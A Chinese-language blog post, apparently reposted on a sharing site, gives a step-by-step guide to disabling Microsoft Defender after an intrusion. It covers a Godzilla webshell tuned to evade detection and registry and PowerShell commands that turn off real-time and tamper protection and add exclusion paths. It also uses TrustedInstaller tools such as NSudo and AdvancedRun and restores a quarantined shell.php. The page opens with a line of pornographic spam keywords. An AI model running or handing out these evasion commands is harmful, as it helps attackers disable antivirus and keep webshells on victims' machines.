国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費(fèi)電子書(shū)等14項(xiàng)超值服

開(kāi)通VIP

首頁(yè)

好書(shū)

留言交流

下載APP

聯(lián)系客服
安全攻防 | 多種方式關(guān)閉討厭的defender!
userphoto

2022.11.27 廣東

關(guān)注

聲明:本人堅(jiān)決反對(duì)利用文章內(nèi)容進(jìn)行惡意攻擊行為,一切錯(cuò)誤行為必將受到懲罰,綠色網(wǎng)絡(luò)需要靠我們共同維護(hù),推薦大家在了解技術(shù)原理的前提下,更好的維護(hù)個(gè)人信息安全、企業(yè)安全、國(guó)家安全。

Microsoft Defender 防病毒軟件在 Windows 10 和 Windows 11 以及 Windows Server 版本中可用。
Microsoft Defender 防病毒軟件是 Microsoft Defender for Endpoint 中下一代保護(hù)的主要組件。這種保護(hù)將機(jī)器學(xué)習(xí)、大數(shù)據(jù)分析、深入的威脅防御研究和 Microsoft 云基礎(chǔ)設(shè)施結(jié)合在一起,以保護(hù)您組織中的設(shè)備(或端點(diǎn))。Microsoft Defender 防病毒軟件內(nèi)置于 Windows 中,它與 Microsoft Defender for Endpoint 配合使用,為你的設(shè)備和云提供保護(hù)。

1
被攻擊目標(biāo)操作系統(tǒng)環(huán)境
(1)defender版本

(2)系統(tǒng)補(bǔ)丁信息

(3)systeminfo 信息


2
攻擊前的準(zhǔn)備工作
web環(huán)境:phpstudy 8.1.1.3 + apache 2.4.39 + php 7.3.4
經(jīng)過(guò)測(cè)試,用Godzilla自帶的PHP_XOR_BASE64加密器即可免殺(php一句話(huà)直接殺),生成 PHP_XOR_BASE64 webshell

靜態(tài)免殺測(cè)試

連接webshell

動(dòng)態(tài)免殺測(cè)試


3
windows命令介紹

cmd
















#查看排除項(xiàng)reg query 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions' /s#查看版本dir 'C:\ProgramData\Microsoft\Windows Defender\Platform\' /od /ad /b#查看篡改保護(hù)(返回結(jié)果中的 數(shù)值5代表開(kāi)啟,數(shù)值4代表關(guān)閉)reg query 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features' /v 'TamperProtection'#需要TrustedInstaller權(quán)限##cmd注冊(cè)表關(guān)閉Windows defenderreg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 1 /f##cmd關(guān)閉篡改保護(hù)NSudoLG.exe -U:T cmd /c 'reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features' /v 'TamperProtection' /d 4 /t REG_DWORD /f'##cmd注冊(cè)表恢復(fù)Windows defenderreg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 0 /f##cmd添加Windows defender排除項(xiàng)reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /v 'c:\temp' /d 0 /t REG_DWORD /f

powershell











#查看排除項(xiàng)Get-MpPreference | select ExclusionPath#關(guān)閉Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true#增加排除項(xiàng)Add-MpPreference -ExclusionPath 'c:\temp'#刪除排除項(xiàng)Remove-MpPreference -ExclusionPath 'C:\test'#關(guān)閉實(shí)時(shí)保護(hù)Set-MpPreference -DisableRealtimeMonitoring $true
4
命令行關(guān)閉defender
TrustedInstaller是從Windows Vista開(kāi)始出現(xiàn)的一個(gè)內(nèi)置安全主體,在Windows中擁有修改系統(tǒng)文件權(quán)限,本身是一個(gè)服務(wù),以一個(gè)賬戶(hù)組的形式出現(xiàn)。它的全名是:NT SERVICE\TrustedInstaller
為什么要獲取TrustedInstaller權(quán)限?說(shuō)白了就是因?yàn)?strong>Administratior權(quán)限和system權(quán)限無(wú)法關(guān)閉Windows defender
注意:以下工具技巧皆需要Administratior權(quán)限才能成功使用

(1)NSudoLG

工具地址:https://github.com/M2Team/NSudo
下載后使用:
D:\Documents\NSudo_8.2_All_Components\NSudoLauncher\x64\NSudoLG.exe

免殺測(cè)試

使用方法

注意:此工具的 -U:T 參數(shù)是獲取了 TrustedInstaller 權(quán)限













#cmd注冊(cè)表關(guān)閉Windows defenderreg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 1 /f#cmd注冊(cè)表恢復(fù)Windows defenderreg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 0 /f#cmd添加Windows defender排除項(xiàng)reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /v 'c:\temp' /d 0 /t REG_DWORD /f#NSudoLG.exe關(guān)閉Windows defenderNSudoLG.exe -U:T cmd /c 'reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 1 /f'#NSudoLG.exe恢復(fù)Windows defenderNSudoLG.exe -U:T cmd /c 'reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 0 /f'#NSudoLG.exe添加Windows defender排除項(xiàng)NSudoLG.exe -U:T cmd /c 'reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /v 'c:\temp' /d 0 /t REG_DWORD /f'

powershell成功上線(xiàn)

(2)AdvancedRun

地址:https://www.nirsoft.net/utils/advanced_run.html

免殺測(cè)試

使用方法



AdvancedRun.exe /EXEFilename '%windir%\system32\cmd.exe' /CommandLine '/c reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableRealtimeMonitoring' /d 1 /t REG_DWORD /f' /RunAs 8 /Run

powershell成功上線(xiàn)

(3)StopDefender

Github地址:https://github.com/lab52io/StopDefender

免殺測(cè)試

使用方法


StopDefender_x64.exe

powershell成功上線(xiàn)

powershell









#查看排除項(xiàng)Get-MpPreference | select ExclusionPath#關(guān)閉Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true#增加排除項(xiàng)Add-MpPreference -ExclusionPath 'c:\temp'#刪除排除項(xiàng)Remove-MpPreference -ExclusionPath 'C:\test'

關(guān)閉 Windows defender

關(guān)閉 實(shí)時(shí)保護(hù)


Set-MpPreference -DisableRealtimeMonitoring $true


(4)MpCmdRun介紹

配置和管理 Microsoft Defender 防病毒軟件的命令行工具詳情
https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus?view=o365-worldwide
MpCmdRun的位置為:
C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>





#查看版本(查看<antimalware platform version>)dir 'C:\ProgramData\Microsoft\Windows Defender\Platform\' /od /ad /b#驗(yàn)證dir 'C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.6-0\' | findstr MpCmdRun

基礎(chǔ)命令









#查看被隔離的文件列表MpCmdRun -Restore -ListAll#恢復(fù)指定名稱(chēng)的文件至原目錄MpCmdRun -Restore -FilePath C:\phpstudy_pro\WWW\shell.php#恢復(fù)所有文件至原目錄MpCmdRun -Restore -All#查看指定路徑是否位于排除列表中MpCmdRun -CheckExclusion -path C:\phpstudy_pro\WWW\

移除Token導(dǎo)致Windows Defender失效

Windows Defender進(jìn)程為MsMpEng.exe,MsMpEng.exe是一個(gè)受保護(hù)的進(jìn)程(Protected Process Light,簡(jiǎn)寫(xiě)為PPL)
非 PPL 進(jìn)程無(wú)法獲取 PPL 進(jìn)程的句柄,導(dǎo)致我們無(wú)法直接結(jié)束 PPL 進(jìn)程 MsMpEng.exe, 但是我們能夠以 SYSTEM 權(quán)限運(yùn)行的線(xiàn)程修改進(jìn)程 MsMpEng.exe 的 token, 當(dāng)我們移除進(jìn)程 MsMpEng.exe 的所有 token 后,進(jìn)程 MsMpEng.exe 無(wú)法訪(fǎng)問(wèn)其他進(jìn)程的資源,也就無(wú)法檢測(cè)其他進(jìn)程是否有害,最終導(dǎo)致 Windows Defender 失效。
本人沒(méi)有利用成功過(guò)

工具地址

https://github.com/pwn1sher/KillDefender
https://github.com/Octoberfest7/KillDefender
https://github.com/Octoberfest7/KDStab

參考文章

https://mp.weixin.qq.com/s/27rvHpsnldnxpJaxwQrLGw
https://zhuanlan.zhihu.com/p/538571344
https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Windows-Defender
https://cloud.tencent.com/developer/article/1870239
本站僅提供存儲(chǔ)服務(wù),所有內(nèi)容均由用戶(hù)發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊舉報(bào)。
打開(kāi)APP,閱讀全文并永久保存 查看更多類(lèi)似文章
猜你喜歡
類(lèi)似文章
將Windows Server 2016 打造成工作站(20161030更新)
Windows系統(tǒng)“無(wú)法打開(kāi)”故障解決方法
cmd參數(shù)說(shuō)明及cmd中windows命令
開(kāi)始→運(yùn)行→命令集錦
關(guān)于注冊(cè)表的學(xué)習(xí)以及常用編輯方法
命令行操作注冊(cè)表
更多類(lèi)似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長(zhǎng)圖 關(guān)注 下載文章
綁定賬號(hào)成功
后續(xù)可登錄賬號(hào)暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服